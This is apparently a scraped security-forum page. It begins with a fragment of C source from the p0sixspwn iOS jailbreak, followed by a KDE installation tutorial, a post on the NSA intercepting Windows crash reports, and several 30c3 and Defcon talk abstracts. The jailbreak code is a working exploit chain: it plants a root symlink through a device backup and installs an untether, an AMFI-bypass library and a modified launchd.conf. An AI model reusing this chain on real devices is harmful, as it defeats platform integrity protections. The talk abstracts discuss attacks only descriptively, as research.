ERROR("Could not make folder\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/", 501, 501, 4) != 0) { ERROR("Failed to symlink root!\n"); return -1; } if (backup_mkdir(backup, "MediaDomain", "Media/Recordings/.haxx/var/untether", 0755, 0, 0, 4) != 0) { ERROR("Could not make folder\n"); return -1; } { char jb_path[128]; char amfi_path[128]; char launchd_conf_path[128]; snprintf(jb_path, 128, "payload/common/untether", build, product); snprintf(amfi_path, 128, "payload/common/_.dylib", build, product); snprintf(launchd_conf_path, 128, "payload/common/launchd.conf", build, product); if (backup_add_file_from_path(backup, "MediaDomain", launchd_conf_path, "Media/Recordings/.haxx/var/untether/launchd.conf", 0100644, 0, 0, 4) != 0) { ERROR("Could not add launchd.conf"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/private/etc/launchd.conf", "/private/var/untether/launchd.conf", 0, 0, 4) != 0) { ERROR("Failed to symlink launchd.conf!\n"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/tar", "Media/Recordings/.haxx/var/untether/tar", 0100755, 0, 0, 4) != 0) { ERROR("Could not add tar"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/bin/tar", "/private/var/untether/tar", 0, 0, 4) != 0) { ERROR("Failed to symlink tar!\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/usr/libexec/dirhelper", "/private/var/untether/dirhelper", 0, 0, 4) != 0) { ERROR("Failed to symlink dirhelper!\n"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/install.deb", "Media/Recordings/.haxx/var/untether/install.deb", 0100755, 0, 0, 4) != 0) { ERROR("Could not add dirhelper"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/dirhelper", "Media/Recordings/.haxx/var/untether/dirhelper", 0100755, 0, 0, 4) != 0) { ERROR("Could not add dirhelper"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", jb_path, "Media/Recordings/.haxx/var/untether/untether", 0100755, 0, 0, 4) != 0) { ERROR("Could not add jb"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", amfi_path, "Media/Recordings/.haxx/var/untether/_.dylib", 0100644, 0, 0, 4) != 0) { ERROR("Could not add amfi"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/Cydia.tar", "Media/Recordings/.haxx/var/untether/Cydia.tar", 0100644, 0, 0, 4) != 0) { ERROR("Could not add cydia"); return -1; } } } idevicebackup2(5, rargv2); backup_free(backup); cb("Finalizing...\n", 90); DEBUG("Installed jailbreak, fixing up directories.\n"); rmdir_recursive_afc(afc, "/Recordings", 1); /********************************************************/ /* * move back any remaining dirs via AFC */ /********************************************************/ is_jailbroken = 1; fix: DEBUG("Recovering files...\n", 80); if (!afc) { lockdown = lockdown_open(device); port = 0; if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { WARN("Could not start AFC service. Aborting.\n"); lockdown_free(lockdown); goto leave; } lockdown_free(lockdown); lockdown = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { WARN("Could not connect to AFC. Aborting.\n"); goto leave; } } rmdir_recursive(backup_dir); WARN("Recovery complete.\n"); if (is_jailbroken) { cb("Your device is now jailbroken, it is now preparing to reboot automatically.\n", 100); WARN("Your device is now jailbroken, it is now preparing to reboot automatically.\n"); /* * Reboot device automatically. */ lockdown = lockdown_open(device); diagnostics_relay_client_t diagnostics_client = NULL; uint16_t diag_port = 0; lockdown_start_service(lockdown, "com.apple.mobile.diagnostics_relay", &diag_port); desc.port = diag_port; if (diagnostics_relay_client_new(device->client, &desc, &diagnostics_client) == DIAGNOSTICS_RELAY_E_SUCCESS) { diagnostics_relay_restart(diagnostics_client, 0); } } else { cb("Your device has encountered an error during the jailbreak process, unplug it and try again.\n", 100); WARN("Your device has encountered an error during the jailbreak process, unplug it and try again.\n"); } leave: afc_client_free(afc); afc = NULL; device_free(device); device = NULL; return 0; } Sursa completa: https://github.com/p0sixspwn/p0sixspwn

[h=1]How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS[/h] December 31st, 2013, 04:40 GMT · By Marius Nestor The following tutorial will teach both existing and new Kubuntu/Ubuntu users how to install or upgrade the brand-new and featureful KDE SC 4.12 desktop environment on their existing and healthy Ubuntu/Kubuntu 13.10 (Saucy Salamander) and 12.04 LTS (Precise Pangolin) operating systems. After yet another six months of hard work, the beautiful KDE Software Compilation reached version 4.12 on December 18, 2013, bringing improvements to its main components: KDE Plasma Workspaces, KDE Applications and KDE Platform. As expected, the Kubuntu developers packaged the KDE Software Compilation's new version for its Kubuntu 13.10 and 12.04 LTS releases, via an easy to use PPA. However, the package also work well on other Ubuntu 13.10 and 12.04 LTS based Linux operating systems, so the following guide will teach you how to install KDE SC 4.12 on top of your existing Ubuntu installation. Step 1 – Add KDE SC 4.12 repositories Open a Terminal window by hitting the CTRL+ALT+T key combination on your keyboard. Copy and paste the following command in the Terminal window: sudo add-apt-repository ppa:kubuntu-ppa/backports Hit Enter, an type your password when asked, and hit the Enter key again. See the next screenshot for details, but do not close the Terminal window yet. Proceed to the next step! Adding the KDE SC 4.12 PPA in Ubuntu 13.10 Now, you need to update the entire package database on your system for the newly added PPA packages with the KDE SC 4.12 release. Copy and paste the following command: sudo apt-get update Hit Enter and wait for it to index the new packages. When it's done, execute the following command (copy and paste) to install KDE SC 4.12 or update your existing KDE installation to the 4.12 version: sudo apt-get install kubuntu-desktop Once again, hit the Enter key when asked if you want to install all the KDE SC 4.12 packages, and wait for them to be downloaded and installed, a process that will take some time, depending on your network connection and computer specs. Installing KDE SC 4.12 in Ubuntu 13.10 When all the KDE SC 4.12 packages have been installed, close the Terminal window and reboot your computer. Immediately after the boot screen, Ubuntu users will notice that the boot splash screen has been replaced with the Kubuntu one, as well as the login screen. At the login screen, select your username, click the button that says "Ubuntu" and select the KDE Plasma Workspace entry. See the screenshot below for details. The login screen of Kubuntu 13.10 Type your password and hit Enter to login. After a few seconds, the KDE SC 4.12 desktop environment will be loaded... Enjoy! KDE SC 4.12 on Ubuntu 13.10 Uninstalling KDE SC 4.12 (optional step) In case you don't like KDE SC 4.12 and you want to remove it from your system and return back to your previous desktop environment, open a Terminal window with the CTRL+ALT+T key combination, access this link and copy/paste that huge command in the terminal window, hit Enter to execute it and again when asked if you want to remove the packages. After that, type the following commands to remove the rest of the KDE packages from your system (one by one, hitting Enter after each one): sudo apt-get autoremove sudo apt-get install ppa-purge sudo ppa-purge ppa:kubuntu-ppa/backports sudo apt-get update sudo apt-get dist-upgrade sudo gedit /etc/lightdm/lightdm.conf Now replace "kde-plasma" with "ubuntu" under the 'user-session=' entry, and "lightdm-kde-greeter" with "unity-greeter" under the 'greeter-session=' entry. Save the file and close it. Reboot your computer and everything should be like it was before installing KDE. Do not hesitate to use our commenting system below in case you encounter any issues with the tutorial. Sursa: How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS

Why the NSA is happy when Windows crashes The latest Snowden leaks via Der Spiegel contain an interesting snippet: the NSA intercepts Windows crash reports en route from the user to Microsoft. “An internal presentation suggests it is NSA’s powerful XKeyscore spying tool that is used to fish these crash reports out of the massive sea of Internet traffic.” The NSA presentation even makes a joke of it, adapting the Microsoft error message to say, “This information may be intercepted by a foreign SIGINT system…” Frankly, I find the NSA sense of humour troubling rather than amusing These error messages, says Spiegel, provide “valuable insights into problems with a targeted person’s computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim’s computer.” Really? Yes really. Websense coincidentally (?) published a report on this very problem yesterday, and will be presenting further findings at RSA 2014 in San Francisco (assuming anybody is still going). It says, One troubling thing we observed is Windows Error Reporting (a.k.a. Dr. Watson) predominantly sends out its crash logs in the clear. These error logs could ultimately allow eavesdroppers to map out vulnerable endpoints and gain a foothold within the network for more advanced penetration. Here’s more on why that’s a concern: 80 percent of all network connected PCs use it – that’s more than one billion endpoints worldwide Dr. Watson reports information that hackers commonly use to find and exploit weak systems such as OS, service pack and update versions Crashes are especially useful for attackers as they may pinpoint a new exploitable code flaw for a zero-day attack Information is also sent for common system events like plugging in a USB device Let’s see how long it takes for Microsoft to respond and start encrypting its error messages. Then the only problem will be in persuading us that it hasn’t simultaneously given NSA the key… Sursa: Why the NSA is happy when Windows crashes | Kevin Townsend

Defcon 21 - Hacking Driverless Vehicles Description: Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. All trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and light-hearted look at the current state of civil driverless vehicles and what hackers or miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. He will also present details of how students can get involved in the ultimate sports events for robot hacking, the autonomous vehicle competitions. Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including the first autonomous crossing of an active highway bridge in the USA, and airborne delivery of life preservers at sea from an autonomous aircraft. He also hosts the annual AUVSI Foundation student autonomous robot competitions such as Roboboat and Robosub. For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Hacking Driverless Vehicles

[h=1]Triggering Deep Vulnerabilities Using Symbolic Execution [30c3][/h] Triggering Deep Vulnerabilities Using Symbolic Execution Deep program analysis without the headache Symbolic Execution (SE) is a powerful way to analyze programs. Instead of using concrete data values SE uses symbolic values to evaluate a large set of parallel program paths at once. A drawback of many systems is that they need source code access and only scale to few lines of code. This talk explains how SE and binary analysis can be used to (i) reverse-engineer components of binary only applications and (ii) construct specific concrete input that triggers a given condition deep inside the application (think of defining an error condition and the SE engine constructs the input to the application that triggers the error). Analysis and reverse engineering of binary programs is cumbersome. Consider the problem that we have a given interesting (error) condition inside the program that we want to trigger. How can we generate a specific input to the program that, during the execution of the program, will trigger the condition. In this talk we use a combination of binary analysis techniques that recover high-level control-flow and data-flow information from a binary-only application and Symbolic Execution (SE) to automate the analysis of such problems. Existing SE tools have often been used to achieve high coverage across all code paths in an application to find implementation bugs. We use SE for a different purpose; given a vulnerability condition hidden deep inside the application what is the input that triggers that condition. We tackle the given problem in three major steps: (i) gathering information about the binary, (ii) analyzing the information-flow and control-flow of the binary, and (iii) using symbolic execution to generate a specific input example that triggers the specified condition. During the information gathering process we define the interesting condition and use regular analysis techniques to set-up later stages. In the information-flow and control-flow analysis we use a given sample input to collect a complete execution trace of the application that is then parsed into a graph that dissects the computation of the application into individual components. The last steps uses fuzzBall, our open-source SE engine to compute specific vulnerability-triggering inputs for the identified components. To evaluate our technique we will show several examples using real programs, showing how we can use specific vulnerability conditions to automatically generate input that triggers this condition. In addition, we will show how our SE engine can be used for other interesting analysis on binary only applications. Our tools are available as open-source and we invite other hackers to join in on this project. Speaker: gannimo EventID: 5224 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]Reverse engineering of CHIASMUS from GSTOOL [30c3][/h] Reverse engineering of CHIASMUS from GSTOOL It hurts. We reverse-engineered one implementation of the non-public CHIASMUS cipher designed by the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI). This did not only give us some insight on the cipher, but also uncovered serious implementation issues in GSTOOL which allow attackers to crack files encrypted with the GSTOOL encryption function with very little effort. In the dark ages of digital cryptography, when ciphers were considered export-controlled munitions and AES was not yet standardized, the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI) decided to invent their own ciphers: CHIASMUS for software implementations and LIBELLE, which would be kept secret and only implemented in hardware. CHIASMUS is not publicly documented. It is implemented in a software tool of the same name, released by the BSI, which is only available where there is a public interest for its use. However, the GSTOOL, a database application for security audit management also released by the BSI, contains an encryption feature using the CHIASMUS block cipher, and is freely available. This software was developed by a third party, Steria Mummert Consulting, and apparently was not properly reviewed. We disassembled and analyzed the GSTOOL to obtain the specification for the encrypted files (and thus the CHIASMUS cipher itself), but we got more than we bargained for. While the cipher itself appears to be pretty secure, the implementation is a collection of rookie mistakes and a great example of what can (and will) go wrong if you ask people with little understanding of cryptography to build cryptographic software and don't verify their results. We invite you to enjoy this thriller full of historic backgrounds, non-public public announcements, legal threats, weapons-grade stupidity, and a very simple solution for complex crypotographic problems. Facepalm with us on the two-year long hunt for the elusive security patch! Have a look at the (not-so-secret-anymore) CHIASMUS block cipher! Learn why you should not build your own crypto tools unless you really know what you are doing, even if you use a known algorithm. And what happens when government contractors attempt to do so. And then attempt to fix it. (Note: Since this is an implementation issue, the stand-alone Chiasmus software tool is not affected by this issue.) Speaker: Jan Schejbal EventID: 5307 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]10 Years of Fun with Embedded Devices [30c3][/h] 10 Years of Fun with Embedded Devices How OpenWrt evolved from a WRT54G firmware to an universal Embedded Linux OS A review of the 10 year history of the OpenWrt project, current events, and upcoming developments. This year we are celebrating ten years of OpenWrt and a long time has passed and a lot has happend since people first started hacking on devices like the WRT54G. Both the hardware and the software landscape has completely changed since then. In this talk we would like to take the chance, together with the audience, to look back on how the OpenWrt distribution did evolve over time and how it has changed its goals, its processes and its software stack. We will show examples of the current state-of-the-art, invite guests on stage, display things to come. And in general, celebrate that 10 years have passed and that many more are to come. The talk will start by looking back into the ancient history of OpenWrt - how it all got started - continue to the present time and give an overview of current and recent developments and then finish with an outlook onto future changes. During the talk we will look at the politics of what we have learned, what we think is broken in the CPE market, and how OpenWrt can help to change this. OpenWrt has, over the course of the past 10 years, created a territory of its own, a territory situated in a landscape criscrossed by relations, friction and interconnections. It is a journey that on its way created an universal embedded Linux operating system. OpenWrt is one of many islands in the Net which thrives by giving away its work to friends, associates and all those many people we don't know. All this is a good reason to celebrate and the talk will finish with beer, exotic drinks and more fun to come. Speaker: nbd EventID: 5497 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]An introduction to Firmware Analysis [30c3][/h] An introduction to Firmware Analysis Techniques - Tools - Tricks This talk gives an introduction to firmware analysis: It starts with how to retrieve the binary, e.g. get a plain file from manufacturer, extract it from an executable or memory device, or even sniff it out of an update process or internal CPU memory, which can be really tricky. After that it introduces the necessary tools, gives tips on how to detect the processor architecture, and explains some more advanced analysis techniques, including how to figure out the offsets where the firmware is loaded to, and how to start the investigation. The talk focuses on the different steps to be taken to acquire and analyze the firmware of an embedded device, especially without knowing anything about the processor architecture in use. Frequently datasheets are not available or do not name any details about the used processor or System on Chip (SoC). First the prerequisites, like knowledge about the device under investigation, the ability to read assembly language, and the tools of the trade for acquisition and analysis, are shown. The question "How do I get the firmware out of device X?" makes the next big chapter: From easy to hard we pass through the different kinds of storage systems and locations a firmware can be stored to, the different ways the firmware gets transferred onto the device, and which tools we can use to retrieve the firmware from where it resides. The next step is to analyze the gathered data. Is it compressed in any way? For which of the various different processor architectures out there was it compiled for? Once we successfully figured out the CPU type and we've found a matching disassembler, where do we start to analyze the code? Often we have to find out the offset where the firmware is loaded to, to get an easy-to-analyze disassembler output. A technique to identify these offsets will be shown. The last chapter covers the modifications we can apply to the firmware, and what types of checksum mechanisms are known to be used by the device or the firmware itself to check the integrity of the code. Speaker: Stefan Widmann EventID: 5477 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]Hardening hardware and choosing a #goodBIOS [30c3][/h] ex=15Hardening hardware and choosing a #goodBIOS Clean boot every boot - rejecting persistence of malicious software and tripping up the evil maid A commodity laptop is analyzed to identify exposed attack surfaces and is then secured on both the hardware and the firmware level against permanent modifications by malicious software as well as quick drive-by hardware attacks by evil maids, ensuring that the machine always powers up to a known good state and significantly raising the bar for an attacker who wants to use the machine against its owner. Commodity computers by design include attack vectors that allow malicious software and attackers who gain brief physical access, so-called evil maids, to take full control over the machine without the owner ever noticing. The presentation briefly enumerates well-known attacks such as remote DMA over IEEE1349/FireWire, BIOS bootkits, AMT and closed source operating system updates to arrive at a problem statement, and moves on in search of solutions which can block the attacks completely or at least hinder them from becoming persistent, starting a layer below them all; with the schematic of a laptop mainboard. A few relatively simple hardware modifications are identified, which together with the coreboot #goodBIOS firmware prevent two entire classes of attacks. The result is a machine which always powers up in a known good state and which must be under attacker control for 20 minutes in order to be compromised, rather than just 20 seconds. In closing the presentation starts a discussion about what we can do to address this problem, which exists in every single computer on the market, on a larger scale. Speaker: Peter Stuge EventID: 5529 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]Fast Internet-wide Scanning and its Security Applications [30c3][/h] _MS0uQv3h&index=23Fast Internet-wide Scanning and its Security Applications Internet-wide network scanning has powerful security applications, including exposing new vulnerabilities, tracking their mitigation, and exposing hidden services. Unfortunately, probing the entire public address space with standard tools like Nmap requires either months of time or large clusters of machines. In this talk, I'll demonstrate ZMap, an open-source network scanner developed by my research group that is designed from the ground up to perform Internet-wide scans efficiently. We've used ZMap with a gigabit Ethernet uplink to survey the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. I'll explain how ZMap's architecture enables such high performance. We'll then work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive. I'll talk about results and experiences from conducting more than 300 Internet-wide scans over the past 18 months, including new revelations about the state of the HTTPS CA ecosystem. I'll discuss the reactions our scans have generated--on one occasion we were mistaken for an Iranian attack against U.S. banks and we received a visit from the FBI--and I'll suggest guidelines and best practices for good Internet citizenship while scanning. Internet-scale network surveys collect data by probing large subsets of the public IP address space. While such scanning behavior is often associated with botnets and worms, it also has proved to be a powerful methodology for security research. Recent studies, beginning with the EFF's SSL Observatory, have demonstrated that Internet-wide scanning can help reveal new kinds of vulnerabilities, monitor deployment of mitigations, and shed light on previously opaque distributed ecosystems. Unfortunately, this methodology has been more accessible to attackers than to researchers without access to botnets or willingness to spread self-replicating code. Comprehensively scanning the public address space with off-the-shelf tools like Nmap requires weeks of time or many machines. To make Internet-wide scanning more accessible, my research team recently introduced ZMap, an open-source network scanner that is designed from the ground up to perform Internet-scale port scans. In our tests using a gigabit Ethernet uplink, ZMap scans the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. By the time of the talk, we'll have switched to a 10 gigE uplink, which should theoretically support scanning the entire address space in under 5 minutes. I'll explain how ZMap's architecture enables such high performance by taking advantage of fast modern hardware and recent improvements to the Linux kernel. We'll work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive, and I'll share experiences from conducting more than 300 Internet-wide scans over the past 18 months, totaling well over 1 trillion probes. I'll describe how we completed hundreds of scans targeting every public HTTPS server (each scan larger than the entire SSL Observatory) in order to shed light on the growth of HTTPS deployments and expose security problems within the HTTPS ecosystem, such as misissued CA certs and widespread server misconfiguration. I'll show how high-speed scanning can be used to expose vulnerable hosts, using IPMI and UPnP vulnerabilities as recent examples. Malicious attackers could abuse this capability to exploit 0day vulnerabilities affecting millions of hosts within hours of a problem's discovery, and better defenses are badly needed. Finally, I'll discuss applications to Internet freedom, including discovering unadvertised services such as hidden Tor bridges (used for censorship resistance) and Bluecoat devices (used for state-sponsored censorship). High-speed scanning can be a powerful tool in the hands of security researchers, but users must be careful not to cause harm by inadvertently overloading networks or causing unnecessary work for network administrators. I'll discuss the complaints and other reactions my group's scanning has generated--on one occasion we were mistaken for an Iranian DoS attack on U.S. banks, and we received a visit from the FBI--and I'll suggest several guidelines and best practices for good Internet citizenship while scanning. Speaker: J. Alex Halderman EventID: 5533 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by

[h=1]Bug class genocide [30c3][/h] _MS0uQv3h&index=31Bug class genocide Applying science to eliminate 100% of buffer overflows Violation of memory safety is still a major source of vulnerabilities in everyday systems. This talk presents the state of the art in compiler instrumentation to completely eliminate such vulnerabilities in C/C++ software. The hacker community has a lot of words for situations in which access to the wrong part of memory leads to an exploitable vulnerability: buffer overflow, integer overflows, stack smashing, heap overflow, use-after-free, double free and so on. Different words are used because the techniques to trigger the faulty memory access and to subsequently use that to gain code execution vary, but they all share a common root cause: violation of spatial and temporal memory safety. If one looks at the C/C++ standard, the situations that tend to be exploitable are "unspecified". Usually, compiler writers take that as an excuse to cut corners, to gain that extra bit of performance in the benchmarks. Because, you know, who cares you're exploitable when you make a mistake, look how fast it is! However, the standards also allow the compiler to introduce safety checks, to see whether access to a pointer actually touches the inside of an allocated object instead of the outside (spatial memory safety), and to make sure that the pointer being accessed actually points to an object that has been allocated, but not yet been freed again (temporal memory safety). Such compilers do exist, in the form of LLVM with specialized optimizer passes that introduce runtime safety checks. This talk will look into the details of the implementation, the performance impact, practical handling, and of course, whether it really delivers the promised 100% protection against buffer overflows. Speaker: Andreas Bogk EventID: 5412 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]How to Build a Mind - Artificial Intelligence Reloaded [30c3][/h] _MS0uQv3h&index=40How to Build a Mind Artificial Intelligence Reloaded A foray into the present, future and ideas of Artificial Intelligence. Are we going to build (beyond) human-level artificial intelligence one day? Very likely. When? Nobody knows, because the specs are not fully done yet. But let me give you some of those we already know, just to get you started. While large factions within the philosophy of mind still seem to struggle over the relationship between mind, world, meaning, intentionality, subjectivity, phenomenal experience, personhood and autonomy, Artificial Intelligence (AI) offers a clear and concise set of answers to these basic questions, as well as avenues of pursuing their eventual understanding. In the view of AI, minds are computational machines, whereby computationalism is best understood as the most contemporary version of the mechanist world view. In the lecture, I will briefly address some of the basic ideas that will underlie a unified computational model of the mind, and especially focus on a computational understanding of motivation and autonomy, representation and grounding, associative thinking, reason and creativity. Speaker: Joscha EventID: 5526 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by

[h=1]FPGA 101 - Making awesome stuff with FPGAs [30c3][/h] _MS0uQv3h&index=54FPGA 101 Making awesome stuff with FPGAs In this talk I want to show you around in the mysterious world of Field Programmable Gate Arrays, or short FPGAs. The aim is to enable you to get a rough understanding on what FPGAs are good at and how they can be used in areas where conventional CPUs and Microcontrollers are failing upon us. FPGAs open up the world of high-speed serial interconnects, nano-second event reactions and hardware fuzzing. In this lecture I will present you the basics of how FPGAs work and how to program them. I will also show-case some tasks where FPGAs really shine. As an example I will show how a 200 MHz FPGA can perform a discrete wavelet twice as fast as an 2.6 GHz i7. I will also show other applications where FPGAs are almost unbeatable, compared to a CPU. At the end I will give you an overview of the market. What are hacker friendly boards, which vendors tool chain sucks the least etc. After this lecture you should be able to decide whether a CPU, a GPU or an FPGA could solve your problem the most efficient. Speaker: Karsten Becker EventID: 5185 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by

[h=1]Reverse engineering the Wii U Gamepad [30c3][/h] _MS0uQv3h&index=65Reverse engineering the Wii U Gamepad A year ago in November 2012, Nintendo released their latest home video game console: the Wii U. While most video game consoles use controllers that are very basic, the Wii U took the opposite route with a very featureful gamepad: wireless with a fairly high range, touch screen, speakers, accelerometer, video camera, and even NFC are supported by the Wii U gamepad. However, as of today, this interesting piece of hardware can only be used in conjunction with a Wii U: wireless communications are encrypted and obfuscated, and there is no documentation about the protocols used for data exchange between the console and its controller. Around december 2012, I started working with two other hackers in order to reverse engineer, document and implement the Wii U gamepad communication protocols on a PC. This talk will present our findings and show the current state of our reverse engineering efforts. When the Wii U was released, a few console hackers and I were talking about potential uses for the Wii U gamepad. However, before being able to use a Wii U gamepad as a remote controller for a robot or a quadricopter, the first step was to understand how it worked and how to communicate with it. This started our long journey of soldering wires on Flash chips, reading the h.264 specification and complaining about the lack of features in most Wi-Fi drivers and devices (on all platforms, Linux and ath9k devices being the least horrible). While some "journalists" reported that the Wii U gamepad is using the Miracast™ technology, a Wi-Fi standard, it turned out that this was never the case. Instead, Nintendo decided to reinvent four different protocols (video streaming, audio streaming, input streaming as well as a light request-reply RPC protocol), and embed them in a slightly obfuscated version of WPA2, sent over the air using 5GHz Wi-Fi 802.11n. A small ARM CPU is embedded in the Wii U Gamepad (codenamed DRC) and runs a realtime operating system to handle network communication. In the Wii U, another ARM CPU (codenamed DRH) does the same thing. In this presentation, we will go into the details of how we went from a 32MB binary blob to a proof of concept of Wii U gamepad "emulation" on a PC, including full documentation of the wireless communications obfuscation layer and partial documentation of the four data exchange protocols used on the gamepad. Speaker: delroth shuffle2 EventID: 5322 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by

[h=1]Backdoors, Government Hacking and The Next Crypto Wars [30c3][/h] _MS0uQv3h&index=69Backdoors, Government Hacking and The Next Crypto Wars Law enforcement agencies claim they are "going dark". Encryption technologies have finally been deployed by software companies, and critically, enabled by default, such that emails are flowing over HTTPS, and disk encryption is now frequently used. Friendly telcos, who were once a one-stop-shop for surveillance can no longer meet the needs of our government. What are the FBI and other law enforcement agencies doing to preserve their spying capabilities? The FBI is rallying political support in Washington, DC for legislation that will give it the ability to fine Internet companies unwilling to build surveillance backdoors into their products. Even without such legislation, the US government has started to wage war against companies that offer secure communications services to their users. As the FBI's top lawyer said in 2010, "[Companies] can promise strong encryption. They just need to figure out how they can provide us plain text." At the same time, law enforcement agencies in the United States and elsewhere are acquiring the tools to hack into the computers of their own citizens. The FBI has purchased custom-built software, while other law enforcement agencies in the US and elsewhere use off-the-shelf spyware from companies like Gamma and Hacking Team. Regardless of the software they use, the capabilities are generally similar: They can enable a computer's webcam and microphone; collect real-time location data; and copy emails, web browsing records, and other documents. Speaker: Christopher Soghoian EventID: 5478 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by

[h=1]The Tor Network [30c3] (with Jacob Applebaum)[/h] 73The Tor Network We're living in interesting times Roger Dingledine and Jacob Appelbaum will discuss contemporary Tor Network issues related to censorship, security, privacy and anonymity online. The last several years have included major cryptographic upgrades in the Tor network, interesting academic papers in attacking the Tor network, major high profile users breaking news about the network itself, discussions about funding, FBI/NSA exploitation of Tor Browser users, botnet related load on the Tor network and other important topics. This talk will clarify many important topics for the Tor community and for the world at large. Speaker: Jacob arma EventID: 5423 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by

[h=1]Extracting keys from FPGAs, OTP Tokens and Door Locks [30c3][/h] index=78Extracting keys from FPGAs, OTP Tokens and Door Locks Side-Channel (and other) Attacks in Practice Side-channel analysis (SCA) and related methods exploit physical characteristics of a (cryptographic) implementations to bypass security mechanisms and extract secret keys. Yet, SCA is often considered a purely academic exercise with no impact on real systems. In this talk, we show that this is not the case: Using the example of several wide-spread real-world devices, we demonstrate that even seemingly secure systems can be attacked by means of SCA with limited effort. This talk briefly introduces implementation attacks and side-channel analysis (SCA) in particular. Typical side-channels like the power consumption and the EM emanation are introduced. The main focus is then on three case studies that have been conducted as part of the SCA research of the Chair for Embedded Security (Ruhr-Uni Bochum) since 2008: The first example are FPGAs that can be protected against reverse-engineering and product counterfeit with a feature called "bitstream encryption". Although the major vendors (Xilinx and Altera) use secure ciphers like AES, no countermeasures against SCA were implemented. As a second example, a wide-spread electronic locking system based on proprietary cryptography is analyzed. The target of the third case study is a popular one-time password token for two-factor authentication, the Yubikey 2. In all three cases, the cryptographic secrets could be recovered within a few minutes to a few hours of measurements, allowing an adversary to decrypt FPGA bitstreams, to clone Yubikeys, and to open all locks in an entire installation, respectively. In conclusion, we summarize possible countermeasures against the presented attacks and describe the communication with the respective vendors as part of a responsible disclosure process. Speaker: David EventID: 5417 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: 